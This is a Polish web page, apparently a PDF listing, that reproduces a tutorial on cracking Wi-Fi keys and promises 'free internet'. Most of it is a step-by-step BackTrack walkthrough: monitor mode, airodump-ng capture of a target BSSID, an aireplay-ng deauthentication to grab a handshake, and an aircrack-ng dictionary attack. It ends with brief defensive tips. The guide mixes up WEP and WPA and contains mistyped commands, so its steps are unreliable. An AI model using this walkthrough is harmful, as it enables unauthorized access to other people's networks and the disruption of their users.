łamanie wpa, PDF
[ Pobierz całość w formacie PDF ]
Jak złamać WEP - zabezpieczenie sieci bezprzewodowej ! Dostęp do darmowego internetu ! Jak skutecznie bronić się przed dostępem do sieci wifi - czyli odkrywamy słabe punkty !Jest to artykuł, który ma ci uwiadomić aby nie korzystać z zabezpieczenia sieci szyfrowaniem WEP. A to co jest tutaj napisane - wykonujesz na własnš odpowiedzialnoć i tylko w obrębie własnej sieci !Pamiętaj - aby nie łamać kluczy innych osób - gdyż jest to nie do końca zgodne z prawem a już na pewno nieetyczne ! Warto przeczytać sobie artykuł o WEP złamany w mniej niż minutę !Na poczštek może kilka kwestii o zabezpieczeniach routerów itp.Pierwszym "niby" zabezpieczeniem jest tzw. SSID - czyli nazwa naszej sieci. Jeżeli kto chce się do niej dostać to musi znać jej prawidłowe oznaczenie. Istnieje możliwoć "ukrycia" się przed mniej wcibskimi użytkownikami. Jednak kto kto będzie chciał rzeczywicie poznać jakie sieci znajdujš się w jego zasięgu - bez problemu odczyta SSID !Kolejnš znanš metodš jest tzw. filtrowanie adresów MAC - czyli naszych kart sieciowych (*każda posiada unikalny adres). Jest to metoda o słabej skutecznoci, gdyż jak większoć wie (ta która ma pojęcie o karcie sieciowej), istnieje możliwoć klonowania adresów MAC - istniejš do tego specjalne programy. Oczywicie jest to zabezpieczenie bardzo popularne np. w zwykłych sieciach np. osiedlowych. A to z tego względu, że gdy podszyjemy się pod czyj numer MAC (sklonujemy go) to w przypadku gdy zostanš podłšczone do sieci dwa komputery z identycznymi numerami wyskoczy błšd - będzie konflikt interesów. Administrator jest w stanie wykryć takie zdarzenie - odpowiednio monitorujšc ruch sieciowy.WEP - zabezpieczenie o którym dzisiaj mowa - było skuteczne do czasu aż nie zostało złamane :)Jest to jeden ze sposobów szyfrowania sieci wifi (*a więc np. naszych routerów). Wbrew pozorom korzysta z niego wcišż baaaaardzzzoo wielu użytkowników. Przeważnie jest to klucz 64bitowy - dzisiaj nie wystarczajšcy ! Złamanie sieci zabezpieczonej w ten sposób może trwać od 5 do 15 minut w zależnoci od ruchu sieciowego jaki generuje.WPA - lepsze niż WEP ! Jest to następca WEP - warto przyjrzeć się WPA2 które jest znacznie bezpieczniejsze i radziłbym korzystać włanie z tego zabezpieczenia. Jednak nie ma rzeczy na 100% skutecznych, a więc gdy widzimy że nasza sieć jest mocno obcišżona to znaczy że co jest nie tak !Istnieje jeszcze kilka innych zabezpieczeń - ale te sš tymi najpopularniejszymi.Do rzeczy ... jak złamać WEP !Warto skorzystać w tym celu z narzędzi przeznaczonych dla systemu LINUX. I włanie opiszę sposób na system "pingwinkowy" - za pomocš którego można poznać klucz sieciowy !Oczywicie program można odpalić jako płytę bootowalnš i nie trzeba instalować programu o którym napiszę.Takim kombajnem hakerów jest platforma, która nazywa się "Backtrack"www.backtrack-linux.orgPo uruchomieniu backtracka - albo w wersji bootowalnej (live cd) albo po zainstalowaniu w komputerze (np. laptopie - z kartš bezprzewodowš) należy go uruchomić wpisujšc : startxta komenda uruchamia system !Po pierwsze uruchamiamy konsolę backtracka i wpisujemy :iwconfig wlan0 mode monitoroczywicie za wlan0 - odpowiednio podstawiamy nasz interfejs karty sieciowej, ale w większoci przypadków będzie to wlan0 ! Aby sprawdzić jaki mamy interfejs wpisujemy :iwconfigNastępnie należy uruchomić airmon :arimon-ng start wlan0Teraz sprawdzimy sieci które sš w naszym zasięgu ;arimon-ng --encrypt wpa wlan0Teraz należy wybrać cel (*naszš sieć) i zapamiętać takie informacje jak : ESSID, BSSID, MAC (*Station) oraz CHANNEL !Teraz włšczamy nasz skaner :airodump-ng --write haslo.cap --channel X --bssid aa:aa:aa:aa:aa:aa --encrypt wpa wlan0odpowiednio podstawiamy nazwa.cap - gdzie zapisujemy - channel X - numer kanału, bssid czyli numer station mac oraz wlan0 - zależne od interfejsu jaki posiadamy !Po wpisaniu wykonamy metodę "handshake" !Teraz w nowej konsoli analogicznie wpisujemy (aby przyspieszyć zdobywanie pakietów ) :aireplay-ng -0 1 -a aa:aa:aa:aa:aa:aa -c aa:aa:aa:aa:aa:aa wlan0pierwsze to nasz adres mac - a drugi to cel - też numer mac station !Teraz czekamy i czekamy ....I wpisujemy w konsoli : (* motoda słownikowa)aircrack-ng -c haslo.cap -w slownik.txtCałoć jest dobrze widoczna na poniższych filmikach sš to dwie różne wersje !A teraz w jaki sposób można się zabezpieczyć przed tego typu atakiem :Warto korzystać z szyfrowania WPA-2, które jest o wiele skuteczniejsze niż "zwyczajne" WEP. Kolejnš rzeczš jest stworzenie w miarę długiego i skomplikowanego hasła - zawierajšcego cyfry i litery.Ponadto warto skorzystać z opcji ukrywania naszego numeru SSID - dzięki temu będziemy mniej widoczni dla potencjalnego intruza.Kolejna rzecz, która może nas nieco uchronić przed tego typu atakiem to zdrowy rozsšdek - jeżeli zobaczymy, że ruch w sieci znaczšco spowalnia to może być sygnał, że kto zapycha nasze łšcze.Możemy więc zainstalować sobie jakie oprogramowanie do monitorowania ruchu sieciowego.
[ Pobierz całość w formacie PDF ]